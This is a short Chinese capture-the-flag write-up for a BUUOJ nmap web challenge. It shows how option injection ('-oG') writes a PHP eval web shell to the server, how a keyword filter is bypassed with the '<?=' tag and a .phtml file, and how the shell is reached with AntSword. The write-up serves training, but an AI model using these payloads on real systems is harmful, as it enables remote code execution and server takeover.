当前位置: 代码迷 >> 综合 >> 第五十六题——[网鼎杯 2020 朱雀组]Nmap
  详细解决方案

第五十六题——[网鼎杯 2020 朱雀组]Nmap

热度:90   发布时间:2023-11-19 19:33:48.0

题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,一个输入框,让我们输入nmap扫描的ip地址

在这里插入图片描述

第二步:获取flag

  1. 可以使用命令 -oG制作一句话木马,输入' <?php @eval($_POST["hack"]);?> -oG hack.php '发现提示hacker,猜测不能使用php关键字
  2. 输入' <?= @eval($_POST["hack"]);?> -oG hack.phtml '发现语句执行成功
  3. 使用蚁剑连接地址http://d27be917-23c4-443f-99f6-7ce2dbd198ff.node3.buuoj.cn/hack.phtml获取flag
    在这里插入图片描述